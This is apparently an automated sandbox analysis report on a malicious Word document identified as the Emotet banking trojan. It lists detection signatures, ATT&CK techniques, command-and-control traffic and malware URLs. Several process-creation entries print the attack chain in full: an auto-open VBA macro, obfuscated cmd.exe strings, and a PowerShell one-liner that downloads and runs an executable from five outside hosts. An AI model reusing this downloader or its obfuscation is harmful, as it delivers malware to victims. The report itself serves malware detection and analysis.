
Analysis Report PAY3646944800277778.doc

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 105688
Start date: 23.01.2019
Start time: 21:17:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: PAY3646944800277778.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.expl.evad.winDOC@24/19@1/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 25.2% (good quality ratio 17.5%)
  • Quality average: 53.2%
  • Quality standard deviation: 40.8%
HCA Information:
  • Successful, ratio: 96%
  • Number of executed functions: 69
  • Number of non-executed functions: 63
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

(Techniques are listed per tactic column; the trailing numbers are the report's signature-hit badges, kept as rendered.)

Initial Access
  • Valid Accounts 2
  • Replication Through Removable Media
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
Execution
  • Command-Line Interface 1
  • Service Execution 1
  • PowerShell 3
  • Scripting 3 2
  • Exploitation for Client Execution 1 3
Persistence
  • Valid Accounts 2
  • Modify Existing Service 1
  • New Service 2
  • System Firmware
  • Shortcut Modification
Privilege Escalation
  • Valid Accounts 2
  • Process Injection 1
  • New Service 2
  • DLL Search Order Hijacking
  • File System Permissions Weakness
Defense Evasion
  • Valid Accounts 2
  • Disabling Security Tools 1
  • Process Injection 1
  • Scripting 3 2
  • Obfuscated Files or Information 1 1
Credential Access
  • Credential Dumping
  • Network Sniffing
  • Input Capture
  • Credentials in Files
  • Account Manipulation
Discovery
  • Process Discovery 2
  • Security Software Discovery 1 3 1
  • Remote System Discovery 1
  • System Service Discovery 1
  • System Information Discovery 1 2
Lateral Movement
  • Application Deployment Software
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
Collection
  • Data from Local System
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
  • Data Staged
Exfiltration
  • Data Encrypted 1
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
Command and Control
  • Uncommonly Used Port 1
  • Standard Cryptographic Protocol 2
  • Standard Non-Application Layer Protocol 3
  • Standard Application Layer Protocol 2 3
  • Standard Cryptographic Protocol

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://iedgeconsulting.net/QJPEwNC | Avira URL Cloud: Label: malware
Source: http://iedgeconsulting.net/QJPEwNC/ | Avira URL Cloud: Label: malware
Source: http://189.253.39.50:8080/ | Avira URL Cloud: Label: malware
Source: http://pramlee.my/J1KMcYHbfV | Avira URL Cloud: Label: malware
Source: http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh | Avira URL Cloud: Label: malware
Source: http://189.253.39.50:8080/4 | Avira URL Cloud: Label: malware
Source: http://www.festivaldescons.fr/zOm7C7jP7DPkcy | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://iedgeconsulting.net/QJPEwNC | virustotal: Detection: 8%
Source: http://iedgeconsulting.net/QJPEwNC/ | virustotal: Detection: 9%
Source: http://189.253.39.50:8080/ | virustotal: Detection: 7%
Source: http://206.248.110.184:8080/ | virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\968.exe | virustotal: Detection: 20%
Multi AV Scanner detection for submitted file
Source: PAY3646944800277778.doc | virustotal: Detection: 22%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72496 CryptDestroyHash
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72279 CryptExportKey
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E723B7 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72399 CryptGenKey,CryptDestroyKey,CryptReleaseContext
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72335 CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72315 CryptDecodeObjectEx,CryptReleaseContext
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E724F6 CryptDuplicateHash,CryptDecrypt,CryptDestroyHash
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72466 CryptEncrypt,CryptDestroyHash
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72406 CryptDuplicateHash
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72595 CryptVerifySignatureW,CryptDestroyHash
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E722C9 CryptGetHashParam

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: winword.exe | Memory has grown: Private usage: 1MB later: 73MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 4x nop then ret 12_2_004044C0
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 4x nop then ret 15_2_004044C0
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 4x nop then ret 16_2_004044C0
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 4x nop then ret 17_2_004044C0
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: iedgeconsulting.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.5:49796 -> 176.9.208.67:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.5:49796 -> 176.9.208.67:80

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.5:49800 -> 206.248.110.184:8080
Source: global traffic | TCP traffic: 192.168.2.5:49801 -> 189.253.39.50:8080
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 182.180.170.72 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 189.253.39.50 (4 connections)
Connects to country known for bullet proof hosters
Source: unknown | Network traffic detected: IP: 182.180.170.72 Pakistan
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /QJPEwNC HTTP/1.1 | Host: iedgeconsulting.net | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /QJPEwNC/ HTTP/1.1 | Host: iedgeconsulting.net
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 182.180.170.72
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | ASN Name: UninetSAdeCVMX
Uses SMTP (mail sending) (signature name as reported; the only evidence is a connection to TCP port 22, not the SMTP port 25, and it matches the http://182.180.170.72:22/ string found in startedradar.exe memory below, i.e. a C2 entry rather than mail traffic)
Source: global traffic | TCP traffic: 192.168.2.5:49797 -> 182.180.170.72:22
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Cookie: 59286=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-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 189.253.39.50:8080 | Connection: Keep-Alive | Cache-Control: no-cache
Contains functionality to download additional files from the internet
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E71628 InternetReadFile
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /QJPEwNC HTTP/1.1 | Host: iedgeconsulting.net | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /QJPEwNC/ HTTP/1.1 | Host: iedgeconsulting.net
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Cookie: 59286=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-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 189.253.39.50:8080 | Connection: Keep-Alive | Cache-Control: no-cache
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: iedgeconsulting.net
Posts data to webserver (signature name as reported; the entry below is the server's HTTP 200 response delivering the stage-2 executable as an attachment, the MZ header is visible at the start of the raw data, not a POST body sent by the sample)
Source: unknown | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 23 Jan 2019 20:18:59 GMT | Server: Apache | X-Powered-By: PHP/5.6.39 | Expires: Tue, 01 Jan 1970 00:00:00 GMT | Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 | Pragma: no-cache | Content-Disposition: attachment; filename="ViMBMxGvK9zg.exe" | Content-Transfer-Encoding: binary | Last-Modified: Wed, 23 Jan 2019 20:18:59 GMT | Transfer-Encoding: chunked | Content-Type: application/octet-stream | Data Raw: 33 64 30 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d2 ef dc e1 96 8e b2 b2 96 8e b2 b2 96 8e b2 b2 9f f6 21 b2 9f 8e b2 b2 96 8e b3 b2 80 8e b2 b2 96 8e b2 b2 97 8e b2 b2 9b dc 69 b2 97 8e b2 b2 9b dc 6c b2 97
Urls found in memory or binary data
Source: startedradar.exe, 00000011.00000003.5180227291.00000000005EC000.00000004.sdmp | String found in binary or memory: http://182.180.170.72:22/
Source: startedradar.exe, 00000011.00000003.5198344661.00000000005EE000.00000004.sdmp | String found in binary or memory: http://189.253.39.50:8080/
Source: startedradar.exe, 00000011.00000003.5198344661.00000000005EE000.00000004.sdmp | String found in binary or memory: http://189.253.39.50:8080/4
Source: startedradar.exe, 00000011.00000003.5180227291.00000000005EC000.00000004.sdmp | String found in binary or memory: http://206.248.110.184:8080/
Source: powershell.exe, 0000000B.00000003.4510760377.0000000007BB9000.00000004.sdmp | String found in binary or memory: http://crl.
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: http://iedgeconsulting.net
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.dr | String found in binary or memory: http://iedgeconsulting.net/QJPEwNC
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: http://iedgeconsulting.net/QJPEwNC/
Source: powershell.exe, 0000000B.00000003.4487894048.0000000005C20000.00000004.sdmp | String found in binary or memory: http://iedgeconsulting.netP
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.dr | String found in binary or memory: http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000003.4510760377.0000000007BB9000.00000004.sdmp | String found in binary or memory: http://pramlee.my/J1
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.dr | String found in binary or memory: http://pramlee.my/J1KMcYHbfV
Source: powershell.exe, 0000000B.00000002.4522024261.00000000051B0000.00000004.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.dr | String found in binary or memory: http://www.festivaldescons.fr/zOm7C7jP7DPkcy
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: http://www.festivaldescons.fr/zOm7C7jP7DPkcy8
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: http://www.festivaldescons.fr/zOm7C7jP7DPkcyP
Source: powershell.exe, 0000000B.00000003.4510760377.0000000007BB9000.00000004.sdmp | String found in binary or memory: http://www.zsz-spb.
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.dr | String found in binary or memory: http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.4527682418.0000000005A55000.00000004.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7D0F9

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E72335 CryptImportKey,LocalFree,CryptReleaseContext

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: PAY3646944800277778.doc | OLE, VBA macro line: jibj = Shell(obhfr + hnsri + rtfqk + fitim + mlhum + uihp + jbpd + tibuj + irbhf + tzav, vbHide)
Powershell connects to network
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 176.9.208.67 80
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\968.exe
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7CFF0 NtdllDefWindowProc_W
Contains functionality to delete services
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7FD30 _snwprintf,OpenServiceW,DeleteService,CloseServiceHandle
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7210D CreateProcessAsUserW
Creates mutexes
Source: C:\Windows\SysWOW64\startedradar.exe | Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1176:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\968.exe | Mutant created: \Sessions\1\BaseNamedObjects\PEM13DC
Source: C:\Users\user\AppData\Local\Temp\968.exe | Mutant created: \Sessions\1\BaseNamedObjects\PEM6CC
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B56EF
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E756EF
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: PAY3646944800277778.doc | OLE, VBA macro line: Sub autoopen()
Document contains embedded VBA macros
Source: PAY3646944800277778.doc | OLE indicator, VBA macros: true
Document contains no OLE stream with summary information
Source: PAY3646944800277778.doc | OLE indicator has summary info: false
Document has an unknown application name
Source: PAY3646944800277778.doc | OLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PAY3646944800277778.doc | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\968.exe, SHA256 34C00C418282067CBC3C5DC419DC093113EE7D0F7E0D26756C091DC1DE6CF3A7
Reads the hosts file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 reads)
Tries to load missing DLLs (wow64log.dll is probed by every 32-bit process running under WOW64 and is not shipped with Windows, so these entries are not specific to the sample)
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll (6 attempts)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64log.dll
Source: C:\Users\user\AppData\Local\Temp\968.exe | Section loaded: wow64log.dll (2 attempts)
Source: C:\Windows\SysWOW64\startedradar.exe | Section loaded: wow64log.dll (2 attempts)
Classification label
Source: classification engine | Classification label: mal100.bank.troj.expl.evad.winDOC@24/19@1/4
Contains functionality to create services
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7FDDB _snwprintf,CreateServiceW,CloseServiceHandle
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B1C10 CreateToolhelp32Snapshot
Contains functionality to modify services (start/stop/modify)
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7FE71 StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates files inside the user directory
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{8D1F1AEE-6CCA-49FF-B753-3BBCC32E0FB3}.tmp
Creates temporary files
Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER762C.tmp
Document contains summary information with irregular field values
Source: PAY3646944800277778.doc | OLE document summary: title field not present or empty
Source: PAY3646944800277778.doc | OLE document summary: author field not present or empty
Source: PAY3646944800277778.doc | OLE document summary: edited time not present or 0
Parts of this application use the .NET runtime (probably coded in C#) (expected here: the loading process is powershell.exe)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: PAY3646944800277778.doc | virustotal: Detection: 22%
Spawns processes
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' FOR /F 'delims=f=wRb tokens=2' %U IN ('assoc.cmd') DO %U '
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmd
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\968.exe 'C:\Users\user\AppData\Local\Temp\968.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\968.exe C:\Users\user\AppData\Local\Temp\968.exe
Source: unknown | Process created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Source: unknown | Process created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
